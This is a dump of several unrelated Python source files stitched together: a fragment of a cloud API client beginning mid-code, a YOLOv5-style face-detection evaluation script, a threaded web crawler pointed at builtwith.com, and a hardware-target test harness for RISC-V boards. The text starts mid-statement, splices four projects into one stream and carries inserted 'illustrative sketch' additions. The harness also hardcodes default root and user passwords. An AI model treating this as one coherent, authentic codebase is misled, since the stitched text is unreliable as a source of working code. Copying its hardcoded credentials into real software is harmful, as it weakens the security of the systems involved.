ParamAnnotation(), 'start': ParamAnnotation(), 'count': ParamAnnotation(), 'groupBy': ParamAnnotation(), 'filterName': ParamAnnotation(), 'replyWithCount': ParamAnnotation(), 'sortBy': ParamAnnotation(), 
'sortDirection': ParamAnnotation(valid_values=['asc', 'desc']), 'fields': ParamAnnotation(), } def __init__(self): super(QueryAction, self).__init__() self.conditions = [] self.limit = None self.start = None self.count = None self.groupBy = None self.replyWithCount = None self.filterName = None self.sortBy = None self.sortDirection = None self.fields = None self.sessionId = None def _query_string(self, params): m = [] ps = {} for k, v in params.items(): if k in self.PARAMS: ps[k] = v for k, v in ps.items(): if v is None: continue if k == 'accessKeySecret': continue if k == 'accessKeyId': continue if k == 'sortBy' and v is not None: if self.sortDirection is None: m.append('sort=%s' % v) else: op = '+' if self.sortDirection == 'asc' else '-' m.append('sort=%s%s' % (op, v)) elif k == 'sortDirection': continue elif k == 'fields': m.append('fields=%s' % ','.join(v)) elif k == 'conditions': m.extend(['q=%s' % q for q in v]) else: m.append('%s=%s' % (k, v)) return '&'.join(m) def _uuid(): return str(uuid4()).replace('-', '') def _json_http( uri, body=None, headers={}, method='POST', timeout=120.0 ): pool = urllib3.PoolManager(timeout=timeout, retries=urllib3.util.retry.Retry(15)) headers.update({'Content-Type': 'application/json', 'Connection': 'close'}) if body is not None and not isinstance(body, str): body = json.dumps(body).encode('utf-8') print '[Request]: %s url=%s, headers=%s, body=%s' % (method, uri, headers, body) if body: headers['Content-Length'] = len(body) rsp = pool.request(method, uri, body=body, headers=headers) else: rsp = pool.request(method, uri, headers=headers) print '[Response to %s %s]: status: %s, body: %s' % (method, uri, rsp.status, rsp.data) return rsp
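# --- Illustrative usage sketch (added for clarity; not part of the original
# file). A minimal, hedged example of how an action built on the classes above
# is typically shaped and invoked. The _ExampleQueryVmInstanceAction name, its
# PATH, and the session id are assumptions for illustration only; real action
# classes are normally generated from the API definitions.
class _ExampleQueryVmInstanceAction(QueryAction):
    HTTP_METHOD = 'GET'
    PATH = '/vm-instances'
    NEED_SESSION = True
    NEED_POLL = False
    PARAM_NAME = ''


def _example_query(session_id):
    configure(hostname='127.0.0.1', port=8080)
    action = _ExampleQueryVmInstanceAction()
    action.sessionId = session_id
    action.conditions = ['name=example-vm']
    # Synchronous call; pass cb=... instead to receive the result asynchronously
    return action.call()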
test.py
import argparse import json import os from pathlib import Path from threading import Thread import numpy as np import torch import yaml from tqdm import tqdm from models.experimental import attempt_load from utils.datasets import create_dataloader from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, box_iou, \ non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, non_max_suppression_face from utils.loss import compute_loss from utils.metrics import ap_per_class, ConfusionMatrix from utils.plots import plot_images, output_to_target, plot_study_txt from utils.torch_utils import select_device, time_synchronized def test(data, weights=None, batch_size=32, imgsz=640, conf_thres=0.001, iou_thres=0.6, # for NMS save_json=False, single_cls=False, augment=False, verbose=False, model=None, dataloader=None, save_dir=Path(''), # for saving images save_txt=False, # for auto-labelling save_hybrid=False, # for hybrid auto-labelling save_conf=False, # save auto-label confidences plots=True, log_imgs=0): # number of logged images # Initialize/load model and set device training = model is not None if training: # called by train.py device = next(model.parameters()).device # get model device else: # called directly set_logging() device = select_device(opt.device, batch_size=batch_size) # Directories save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir # Load model model = attempt_load(weights, map_location=device) # load FP32 model imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size # Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99 # if device.type != 'cpu' and torch.cuda.device_count() > 1: # model = nn.DataParallel(model) # Half half = device.type != 'cpu' # half precision only supported on CUDA if half: model.half() # Configure model.eval() is_coco = data.endswith('coco.yaml') # is COCO dataset with open(data) as f: data = yaml.load(f, Loader=yaml.FullLoader) # model dict check_dataset(data) # check nc = 1 if single_cls else int(data['nc']) # number of classes iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95 niou = iouv.numel() # Logging log_imgs, wandb = min(log_imgs, 100), None # ceil try: import wandb # Weights & Biases except ImportError: log_imgs = 0 # Dataloader if not training: img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True)[0] seen = 0 confusion_matrix = ConfusionMatrix(nc=nc) names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)} coco91class = coco80_to_coco91_class() s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95') p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0. 
loss = torch.zeros(3, device=device) jdict, stats, ap, ap_class, wandb_images = [], [], [], [], [] for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)): img = img.to(device, non_blocking=True) img = img.half() if half else img.float() # uint8 to fp16/32 img /= 255.0 # 0 - 255 to 0.0 - 1.0 targets = targets.to(device) nb, _, height, width = img.shape # batch size, channels, height, width with torch.no_grad(): # Run model t = time_synchronized() inf_out, train_out = model(img, augment=augment) # inference and training outputs t0 += time_synchronized() - t # Compute loss if training: loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls # Run NMS targets[:, 2:6] *= torch.Tensor([width, height, width, height]).to(device) # to pixels lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling t = time_synchronized() #output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb) output = non_max_suppression_face(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb) t1 += time_synchronized() - t # Statistics per image for si, pred in enumerate(output): #pred = torch.cat((pred[:, :5], pred[:, 13:]), 1) # throw landmark in thresh labels = targets[targets[:, 0] == si, 1:] nl = len(labels) tcls = labels[:, 0].tolist() if nl else [] # target class path = Path(paths[si]) seen += 1 if len(pred) == 0: if nl: stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls)) continue # Predictions predn = pred.clone() scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred # Append to text file if save_txt: gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh for *xyxy, conf, cls in predn.tolist(): xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f: f.write(('%g ' * len(line)).rstrip() % line + '\n') # W&B logging if plots and len(wandb_images) < log_imgs: box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]}, "class_id": int(cls), "box_caption": "%s %.3f" % (names[cls], conf), "scores": {"class_score": conf}, "domain": "pixel"} for *xyxy, conf, cls in pred.tolist()] boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name)) # Append to pycocotools JSON dictionary if save_json: # [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ... 
image_id = int(path.stem) if path.stem.isnumeric() else path.stem box = xyxy2xywh(predn[:, :4]) # xywh box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner for p, b in zip(pred.tolist(), box.tolist()): jdict.append({'image_id': image_id, 'category_id': coco91class[int(p[15])] if is_coco else int(p[15]), 'bbox': [round(x, 3) for x in b], 'score': round(p[4], 5)}) # Assign all predictions as incorrect correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device) if nl: detected = [] # target indices tcls_tensor = labels[:, 0] # target boxes tbox = xywh2xyxy(labels[:, 1:5]) scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels if plots: confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1)) # Per target class for cls in torch.unique(tcls_tensor): ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices # Search for detections if pi.shape[0]: # Prediction to target ious ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices # Append detections detected_set = set() for j in (ious > iouv[0]).nonzero(as_tuple=False): d = ti[i[j]] # detected target if d.item() not in detected_set: detected_set.add(d.item()) detected.append(d) correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn if len(detected) == nl: # all targets already located in image break # Append statistics (correct, conf, pcls, tcls) stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # Plot images if plots and batch_i < 3: f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start() f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start() # Compute statistics stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy if len(stats) and stats[0].any(): p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names) p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95] mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean() nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class else: nt = torch.zeros(1) # Print results pf = '%20s' + '%12.3g' * 6 # print format print(pf % ('all', seen, nt.sum(), mp, mr, map50, map)) # Print results per class if verbose and nc > 1 and len(stats): for i, c in enumerate(ap_class): print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i])) # Print speeds t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple if not training: print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t) # Plots if plots: confusion_matrix.plot(save_dir=save_dir, names=list(names.values())) if wandb and wandb.run: wandb.log({"Images": wandb_images}) wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]}) # Save JSON if save_json and len(jdict): w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights anno_json = '../coco/annotations/instances_val2017.json' # annotations json pred_json = str(save_dir / f"{w}_predictions.json") # predictions json print('\nEvaluating pycocotools mAP... saving %s...' 
% pred_json) with open(pred_json, 'w') as f: json.dump(jdict, f) try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval anno = COCO(anno_json) # init annotations api pred = anno.loadRes(pred_json) # init predictions api eval = COCOeval(anno, pred, 'bbox') if is_coco: eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate eval.evaluate() eval.accumulate() eval.summarize() map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5) except Exception as e: print(f'pycocotools unable to run: {e}') # Return results if not training: s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else '' print(f"Results saved to {save_dir}{s}") model.float() # for training maps = np.zeros(nc) + map for i, c in enumerate(ap_class): maps[c] = ap[i] return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t if __name__ == '__main__': parser = argparse.ArgumentParser(prog='test.py') parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)') parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path') parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch') parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)') parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold') parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS') parser.add_argument('--task', default='val', help="'val', 'test', 'study'") parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset') parser.add_argument('--augment', action='store_true', help='augmented inference') parser.add_argument('--verbose', action='store_true', help='report mAP by class') parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt') parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels') parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file') parser.add_argument('--project', default='runs/test', help='save to project/name') parser.add_argument('--name', default='exp', help='save to project/name') parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') opt = parser.parse_args() opt.save_json |= opt.data.endswith('coco.yaml') opt.data = check_file(opt.data) # check file print(opt) if opt.task in ['val', 'test']: # run normally test(opt.data, opt.weights, opt.batch_size, opt.img_size, opt.conf_thres, opt.iou_thres, opt.save_json, opt.single_cls, opt.augment, opt.verbose, save_txt=opt.save_txt | opt.save_hybrid, save_hybrid=opt.save_hybrid, save_conf=opt.save_conf, ) elif opt.task == 'study': # run over a range of settings and save/plot for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']: f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to x = list(range(320, 800, 64)) # x axis y = [] # y axis for i in x: # img-size print('\nRunning %s point %s...' 
% (f, i)) r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json, plots=False) y.append(r + t) # results and times np.savetxt(f, y, fmt='%10.4g') # save os.system('zip -r study.zip study_*.txt') plot_study_txt(f, x) # plot
main.py
import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *

ALL_OF_MY_CATEGORIES = read_file('category.txt')
PROJECT_NAME = ALL_OF_MY_CATEGORIES[0].split('\n')[0]
DOMAIN_NAME = get_domain_name('https://builtwith.com')
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8
queue = Queue()

# Crawl the first category, then remove it from the pending category file
remaining_categories = file_to_set('category.txt')
Spider(PROJECT_NAME, ALL_OF_MY_CATEGORIES[0].split('\n')[0], DOMAIN_NAME)
remaining_categories.remove(ALL_OF_MY_CATEGORIES[0].split('\n')[0])
set_to_file(remaining_categories, 'category.txt')


# Create worker threads (will die when main exits)
def create_workers():
    for _ in range(NUMBER_OF_THREADS):
        t = threading.Thread(target=work)
        t.daemon = True
        t.start()


# Do the next job in the queue
def work():
    while True:
        category = queue.get()
        Spider(category, category, DOMAIN_NAME)
        queue.task_done()


# Each queued category is a new job
def create_jobs():
    for category in file_to_set('category.txt'):
        queue.put(category)
    queue.join()
    crawl()


# Check whether there are categories left in the file; if so, crawl them
def crawl():
    queued_categories = file_to_set('category.txt')
    if len(queued_categories) > 0:
        print(str(len(queued_categories)) + ' categories left')
        create_jobs()


create_workers()
crawl()
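# --- Illustrative sketch (added for clarity; not part of the original file).
# A minimal, hedged restatement of the worker/queue pattern used above: daemon
# threads block on queue.get(), every item taken is paired with task_done(),
# and queue.join() in the producer returns only once all queued items have
# been marked done. `process_category` is a placeholder for the Spider(...)
# call used in the real script.
def _run_jobs_sketch(categories, process_category, n_threads=NUMBER_OF_THREADS):
    jobs = Queue()

    def worker():
        while True:
            category = jobs.get()
            try:
                process_category(category)
            finally:
                jobs.task_done()  # always pair a get() with task_done()

    for _ in range(n_threads):
        t = threading.Thread(target=worker, daemon=True)
        t.start()

    for category in categories:
        jobs.put(category)
    jobs.join()  # blocks until every queued category has been processed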
common.py
#! /usr/bin/env python3 """ Main commonTarget class + misc common functions """ from besspin.base.utils.misc import * import os, sys, glob import pexpect, subprocess, threading import time, random, secrets, crypt import string, re import socket, errno, pty, termios, psutil from collections import Iterable from besspin.fett.unix import database from besspin.fett.unix import webserver from besspin.fett.unix import voting from besspin.fett.freertos import freertos from besspin.fett.unix import ssh class commonTarget(): def __init__(self, targetId=None): # target settings self.targetId = targetId self.targetIdInfo = f'<target{targetId}>: ' if (targetId) else '' self.targetSuffix = f'_{self.targetId}' if (self.targetId) else '' self.target = getSetting('target',targetId=self.targetId) if (self.target=='awsf1'): self.pvAWS = getSetting('pvAWS',targetId=self.targetId) self.targetInfo = (f"aws:{self.pvAWS}" if (self.target=='awsf1') else self.target) self.osImage = getSetting('osImage',targetId=self.targetId) self.processor = getSetting('processor',targetId=self.targetId) self.binarySource = getSetting('binarySource',targetId=self.targetId) self.sourceVariant = getSetting('sourceVariant',targetId=self.targetId) self.elfLoader = getSetting('elfLoader',targetId=self.targetId) self.procLevel = getSetting('procLevel',targetId=self.targetId) self.procFlavor = getSetting('procFlavor',targetId=self.targetId) self.xlen = getSetting('xlen',targetId=self.targetId) self.tarballName = getSetting('tarballName') self.process = None self.ttyProcess = None self.fTtyOut = None self.sshProcess = None self.fSshOut = None self.restartMode = False self.isSshRootEnabled = ((self.osImage=='FreeBSD') and (self.target=='vcu118')) # all OSes settings self.ipTarget = None self.ipHost = None self.portTarget = getSetting('commPortTarget') self.portHost = getSetting('commPortHost') # Unix settings self.inInteractMode = False self.stopShowingTime = None self.resendAttempts = 0 self.limitResendAttempts = 5 if ((self.osImage=='FreeBSD') and (self.target=='qemu')) else 3 # For ssh self.sshHostPort = None self.isSshConn = False self.sshRetries = 0 self.sshLimitRetries = 3 self.sshECDSAkeyWasUpdated = False self.onlySsh = ((self.osImage=='FreeBSD') and (self.target=='vcu118') and (self.binarySource=='GFE')) self.osHasBooted = False self.isCurrentUserRoot = True #This will be the indicator of which user we are logged in as. 
self.rootPassword = 'ssithdefault' if (self.osImage=='FreeBSD') else 'riscv' self.rootGroup = 'wheel' if (self.osImage=='FreeBSD') else 'root' self.userPassword = "besspin_2020" self.userName = (getSetting('userName') if isEnabled("useCustomCredentials") else "researcher") self.userCreated = False self.AttemptShutdownFailed = False self.keyboardInterruptTriggered = False self.terminateTargetStarted = False self.targetTearDownCalled = False self.appModules = [] if (getSetting('mode') in ['fettTest', 'fettProduction']): #Bugbounty app stack self.httpPortTarget = getSetting('HTTPPortTarget') self.httpsPortTarget = getSetting('HTTPSPortTarget') self.votingHttpPortTarget = getSetting('VotingHTTPPortTarget') self.votingHttpsPortTarget = getSetting('VotingHTTPSPortTarget') #Needed for findPort self.portsStep = 1 if (targetId is None) else getSetting('nTargets') portsShift = 0 if (targetId is None) else targetId-1 self.portsBegin = getSetting('portsRangeStart') + portsShift self.portsEnd = getSetting('portsRangeEnd') return @decorate.debugWrap def terminateAndExit (self,message,overrideShutdown=False,overrideConsole=False,exitCode=None,exc=None): if (self.stopShowingTime is not None): #turn off any time display try: self.stopShowingTime.set() except: pass errorAndLog(message,exc=exc) if (not overrideShutdown): self.shutdown(overrideConsole=overrideConsole,isError=True) self.tearDown() logAndExit("",exitCode=exitCode) @decorate.debugWrap @decorate.timeWrap def switchUser (self): if (not self.userCreated): warnAndLog("<switchUser> is called, but a user was never created.") self.createUser() if (self.osImage in ['debian', 'FreeBSD']): if (not self.isSshConn): isPrevUserRoot = self.isCurrentUserRoot self.isCurrentUserRoot = not self.isCurrentUserRoot self.runCommand ("exit",endsWith="login:") if (isPrevUserRoot): #switch to the other user loginName = self.userName loginPassword = self.userPassword else: #switch to root loginName = 'root' loginPassword = self.rootPassword self.runCommand (loginName,endsWith="Password:") if (self.osImage=='FreeBSD'): #Work around the occasional login failures maxLoginAttempts = 3 iAttempt = 0 loginSuccess = False while ((not loginSuccess) and (iAttempt < maxLoginAttempts)): # will timeout on error, not return Login failed retCommand = self.runCommand(loginPassword, endsWith=[self.getDefaultEndWith(),"\r\nlogin:"], timeout=60, suppressErrors=True, exitOnError=False, issueInterrupt=False) if retCommand[2]: printAndLog(f"{self.targetIdInfo}switchUser: Failed to login and received timeout. Trying again...",doPrint=False) # for some reason, needs to accept input to see the login failed string self.runCommand(" ",endsWith=["Login incorrect"],timeout=20) self.runCommand (loginName,endsWith="Password:") time.sleep(3) #wait for the OS to be ready for the password (maybe this works) iAttempt += 1 continue if (retCommand[3] == 0): loginSuccess = True elif (retCommand[3] == 1): # try again printAndLog(f"{self.targetIdInfo}switchUser: Failed to login. 
Trying again...",doPrint=False) self.runCommand (loginName,endsWith="Password:") time.sleep(3) #wait for the OS to be ready for the password (maybe this works) iAttempt += 1 else: printAndLog(f"{self.targetIdInfo}switchUser: Failed to login <iAttempt={iAttempt}>, and this part should never be executed!",doPrint=False) if (not loginSuccess): self.terminateAndExit(f"{self.targetIdInfo}switchUser: Failed to login ({maxLoginAttempts} times).",exitCode=EXIT.Run) else: self.runCommand (loginPassword) else: #open and close sshConnections self.closeSshConn() self.isCurrentUserRoot = not self.isCurrentUserRoot if (not self.isCurrentUserRoot): #switch to the other user sshSuccess = self.openSshConn(userName=self.userName) else: #switch to root sshSuccess = self.openSshConn(userName='root') if (not sshSuccess): self.terminateAndExit(f"switchUser: Failed to switch user.") elif (self.osImage=='busybox'): if (self.isCurrentUserRoot): #switch to the other user self.runCommand ("su {0}".format(self.userName),endsWith="\$") self.runCommand ("cd ~",endsWith="\$") else: #switch to root self.runCommand ("exit",endsWith="~ #") self.isCurrentUserRoot = not self.isCurrentUserRoot #<This needs to be figured out for busybox in case the login itself fails else: self.terminateAndExit(f"<switchUser> is not implemented on <{self.osImage}>.",exitCode=EXIT.Dev_Bug) return @decorate.debugWrap @decorate.timeWrap def shutdown (self,overrideConsole=False,isError=False): if (self.AttemptShutdownFailed): self.terminateAndExit(f"shutdown: Unable to shutdown the {self.target} properly.", overrideShutdown=True,exitCode=EXIT.Run) self.AttemptShutdownFailed = True #to avoid being trapped if the switching user failed and target is not responding if (isEnabled('openConsole') and (not overrideConsole)): if (self.isSshConn): #only interact on the JTAG self.closeSshConn() if (isEnabled('gdbDebug')): self.startGdbDebug() self.interact() if (isEnabled('gdbDebug')): self.endGdbDebug() if (self.userCreated): #Ensure self.isCurrentUserRoot is properly set #Check which user is logged in _,_,_,idxRet = self.runCommand(" ",endsWith=self.getAllEndsWith()) if (idxRet>=0): #success if (self.getAllEndsWith()[idxRet] != self.getDefaultEndWith()): #isCurrentUserRoot is wrong! self.isCurrentUserRoot = not self.isCurrentUserRoot else: #How would this happen? If an error happens, runCommand should call terminateAndExit and exit from there logAndExit("shutdown: Failed to find out which user is logged in in openConsole mode." 
" <This Error should never happen>",exitCode=EXIT.Dev_Bug) if (not self.isCurrentUserRoot): self.switchUser() self.terminateTarget() printAndLog (f"{self.targetIdInfo}{self.target} shut down successfully!", doPrint=not (isEqSetting('mode', 'evaluateSecurityTests') and (self.osImage=='FreeRTOS'))) return @decorate.debugWrap def parseBootTimeoutDict (self,bootTimeoutDict,key="boot"): try: return bootTimeoutDict[key] except Exception as exc: logAndExit (f"Failed to extract the timeout value for <{key}> from the timeout dict.",exc=exc,exitCode=EXIT.Dev_Bug) @decorate.debugWrap def get_timeout_from_settings_dict(self,osImage): def traverse_data(layer): if 'timeout' in layer: return True, layer['timeout'], None elif 'name' in layer: name = layer['name'] if (name in ["cross-compiler"]): #A list of non-target settings in bootTimeout.json setting = getSetting(name) else: setting = getSetting(name,targetId=self.targetId) if setting in layer: return traverse_data(layer[setting]) elif 'else' in layer: return traverse_data(layer['else']) else: return False, 0, { 'message': f'Unrecognized value <{setting}> for setting <{name}> in <bootTimeout.json>.', 'overrideShutdown': True, 'exitCode': EXIT.Dev_Bug } else: return False, 0, { 'message': f'Unrecognized layer <{layer}> in <bootTimeout.json>.', 'overrideShutdown': True, 'exitCode': EXIT.Dev_Bug } data = safeLoadJsonFile(os.path.join(getSetting('repoDir'), 'besspin', 'target', 'utils', 'bootTimeout.json')) if (osImage not in data): return False, 0, { 'message': f'start: Timeout is not recorded for osImage=<{osImage}>.', 'overrideShutdown': True, 'exitCode': EXIT.Implementation } os_image = data[osImage] if (osImage in ['busybox', 'FreeRTOS']): #special case return traverse_data(os_image) elif self.target not in os_image: return False, 0, { 'message': f'start: Timeout is not recorded for target=<{self.target}>.', 'overrideShutdown': True, 'exitCode': EXIT.Implementation } target = os_image[self.target] return traverse_data(target) @decorate.debugWrap @decorate.timeWrap def start (self): if (isEqSetting("mode","evaluateSecurityTests") and (not isEnabled("isThereAReasonToBoot"))): return #there is no reason to boot success, timeoutDict, message = self.get_timeout_from_settings_dict(self.osImage) if not success: self.terminateAndExit(**message) if self.osImage in ['debian', 'busybox', 'FreeBSD']: if (self.restartMode and (self.target=='awsf1')): for timeout in timeoutDict.keys(): timeoutDict[timeout] += 120 #takes longer to restart printAndLog(f"{self.targetIdInfo}start: Booting <{self.osImage}> on " f"<{self.target}>. 
This might take a while...") self.sumTimeout = sum(timeoutDict.values()) if (self.osImage=='debian'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) self.boot(endsWith="login:",timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful #logging in printAndLog (f"{self.targetIdInfo}start: Logging in, activating ethernet, and setting system time...",doPrint=(not self.targetId)) self.runCommand ("root",endsWith="Password:",overrideShutdown=True) loginTimeout = 120 if (self.restartMode and (self.target=='awsf1')) else 60 self.runCommand (self.rootPassword,timeout=loginTimeout,overrideShutdown=True) elif (self.osImage=='busybox'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) self.boot(endsWith="Please press Enter to activate this console.",timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful self.runCommand (" ",endsWith="/ #",timeout=10,overrideShutdown=True) #This is necessary self.runCommand("cd root",timeout=10) printAndLog (f"{self.targetIdInfo}start: Logging in, activating ethernet, and setting system time...",doPrint=(not self.targetId)) elif (self.osImage=='FreeRTOS'): if (self.binarySource=='Michigan'): startMsg = 'INFO: Open database successfully' else: startMsg = '>>>Beginning of Besspin<<<' self.boot (endsWith=startMsg,timeoutDict=timeoutDict) elif (self.osImage=='FreeBSD'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) bootEndsWith = "login:" self.boot(endsWith=bootEndsWith, timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful # set the temporary prompt if ((self.binarySource=="SRI-Cambridge") or ((self.binarySource=="GFE") and (self.target=='awsf1') and (self.pvAWS=="connectal"))): tempPrompt = "~ #" else: tempPrompt = "\r\n#" # vcu118 freebsd would be already logged in if onlySsh if (self.target=='qemu'): self.runCommand ("root",endsWith=tempPrompt,overrideShutdown=True) self.runCommand (f"echo \"{self.rootPassword}\" | pw usermod root -h 0",erroneousContents="pw:",endsWith=tempPrompt) elif (not self.onlySsh): if ((self.binarySource!="SRI-Cambridge") or (self.restartMode and (self.target=='awsf1'))): self.runCommand ("root",endsWith='Password:',overrideShutdown=True) self.runCommand (self.rootPassword,endsWith=tempPrompt,overrideShutdown=True) else: self.runCommand ("root",endsWith=tempPrompt,overrideShutdown=True) if (self.target!='awsf1'): self.runCommand("echo \"besspinPrompt> \" > promptText.txt",endsWith=tempPrompt) #this is to avoid having the prompt in the set prompt command self.runCommand(f"echo \'set prompt = \"besspinPrompt> \"\' > .cshrc",endsWith=tempPrompt) self.runCommand("set prompt = \"`cat promptText.txt`\"") self.runCommand("rm promptText.txt") printAndLog (f"{self.targetIdInfo}start: Activating ethernet and setting system time...",doPrint=(not self.targetId)) # Register that the OS has booted self.osHasBooted = True if (isEqSetting('mode', 'evaluateSecurityTests') and (self.osImage=='FreeRTOS')): printAndLog(f"{self.targetIdInfo}start: {self.osImage} booted successfully!", doPrint=False) # Return early to save time by 
avoiding unnecessary setup return #up the ethernet adaptor and get the ip address if (not ((self.osImage=='FreeRTOS') and (self.target=='qemu'))): #network is not supported on FreeRTOS qemu self.activateEthernet() if (self.restartMode and (self.target=='awsf1')): #skip the reset of start() in awsf1 mode if (self.osImage=='debian'): # timesync is not in the boot sequence of neither GFE nor MIT images ntpTimeout = 150 if (self.binarySource=='MIT') else 60 # MIT needs some more time to be responsive self.runCommand("systemctl start systemd-timesyncd.service",timeout=ntpTimeout) printAndLog (f"{self.targetIdInfo}start: {self.osImage} booted _again_ successfully!") return #fixing the time is important to avoid all time stamp warnings, and because it messes with Makefile. awsNtpServer = "169.254.169.123" if (self.osImage=='debian'): if (self.target=='awsf1'): # Use AWS NTP server self.runCommand(f"echo 'NTP={awsNtpServer}' >> " "/etc/systemd/timesyncd.conf") else: self.runCommand("echo \"nameserver 1.1.1.1\" > /etc/resolv.conf") self.runCommand("systemctl start systemd-timesyncd.service") if not self.hasHardwareRNG(): #get the ssh up and running if (self.procLevel=='p3'): time.sleep(5) #need some time to recover before being able to sendFile self.sendFile(getSetting('buildDir',targetId=self.targetId),'addEntropyDebian.riscv') self.runCommand("chmod +x addEntropyDebian.riscv") self.ensureCrngIsUp () #check we have enough entropy for ssh if ((self.processor=='bluespec_p3') and isEqSetting('mode','evaluateSecurityTests')): self.openSshConn() elif (self.osImage=='FreeBSD'): if (self.target=='awsf1'): # Delete default NTP 